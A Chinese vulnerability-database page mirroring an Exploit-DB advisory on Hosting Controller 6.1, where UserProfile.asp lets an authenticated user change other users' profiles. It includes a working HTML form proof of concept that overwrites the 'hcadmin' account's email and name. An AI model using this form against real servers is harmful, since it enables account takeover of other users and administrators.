Hosting Controller 6.1 – User Profile Unauthorized Access

27次阅读
没有评论

Hosting Controller 6.1 – User Profile Unauthorized Access

漏洞ID 1055139 漏洞类型
发布时间 2005-05-30 更新时间 2005-05-30
Hosting Controller 6.1 - User Profile Unauthorized AccessCVE编号 N/A
Hosting Controller 6.1 - User Profile Unauthorized AccessCNNVD-ID N/A
漏洞平台 ASP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25758
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/13816/info

Hosting Controller is prone to an unauthorized access vulnerability.

Reportedly an authenticated user can modify other user's profiles. This issue is due to a failure in the application to perform proper authentication before providing access to 'UserProfile.asp'. 

Change users profiles:
<form
action="http://www.example.com/admin//accounts/UserProfile.asp?action=updateprofile"
method="post">
Username : <input name="UserList" value="hcadmin"
type="text" size="50">
<br>
emailaddress : <input name="emailaddress"
value="[email protected]" type="text" size="50">
<br>
firstname : <input name="firstname" value="Crkchat"
type="text" size="50">
<br>
<input name="submit" value="submit" type="submit">
</form>

相关推荐: Network Associates WebShield SMTP Configuration Modification Vulnerability

Network Associates WebShield SMTP Configuration Modification Vulnerability 漏洞ID 1104047 漏洞类型 Access Validation Error 发布时间 2000-05-…

正文完
 0